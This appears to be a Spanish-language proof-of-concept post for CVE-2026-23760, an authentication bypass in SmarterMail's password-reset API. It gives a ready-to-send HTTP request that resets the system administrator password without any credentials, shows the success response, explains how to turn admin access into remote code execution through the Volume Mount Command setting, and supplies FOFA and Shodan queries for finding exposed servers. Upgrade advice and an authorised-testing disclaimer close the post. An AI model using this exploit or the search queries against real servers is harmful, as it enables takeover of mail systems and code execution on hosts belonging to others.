
CVE-2026-23760 - Una omisión de autenticación a través de la API de restablecimiento de contraseña en SmarterMail.
Una prueba de concepto que explota una omisión de autenticación a través de la API de restablecimiento de contraseña para la cuenta de administrador del sistema SmarterMail.
La vulnerabilidad existe debido a una omisión de autenticación en la API de restablecimiento de contraseña. El endpoint force-reset-password permite solicitudes anónimas y no verifica la contraseña existente ni un token de restablecimiento al restablecer cuentas de administrador del sistema.
El PoC es tan simple como esto:
POST /api/v1/auth/force-reset-password HTTP/1.1
Host: xxxxxxx:9998
Content-Type: application/json
Content-Length: 145
{"IsSysAdmin":"true",
"OldPassword":"watever",
"Username":"admin",
"NewPassword":"NewPassword123!@#",
"ConfirmPassword": "NewPassword123!@#"}
Deberías recibir la siguiente respuesta, que confirma que la contraseña se ha modificado correctamente:
{
"username":"",
"errorCode":"",
"errorData":"",
"debugInfo":"check1\\r\\ncheck2\\r\\ncheck3\\r\\ncheck4.2\\r\\ncheck5.2\\r\\ncheck6.2\\r\\ncheck7.2\\r\\ncheck8.2\\r\\n",
"success":true,
"resultCode":200
}
El único requisito restante es conocer el nombre de usuario de la cuenta de administrador.
Una vez autenticado como administrador del sistema, un atacante puede:
Settings -> Volume Mounts.Volume Mount Command.Ese comando es ejecutado por el sistema operativo subyacente. En ese punto, el atacante ha logrado la ejecución remota de código completa en el host.
Cuando se guarda la configuración, el comando proporcionado se ejecuta inmediatamente.
Plantilla de Nuclei:
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2026/CVE-2026-23760.yaml
FOFA:
title='SmarterMail'
SHODAN:
html:'SmarterMail'
Un atacante remoto no autenticado puede omitir la autenticación de la cuenta de administrador del sistema y obtener acceso. Una vez autenticado, puede completar una ejecución remota de código completa en el host.
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N - 9.3:Crítico
Actualiza a la última versión: https://www.smartertools.com/smartermail/downloads
Esta herramienta es solo para pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal.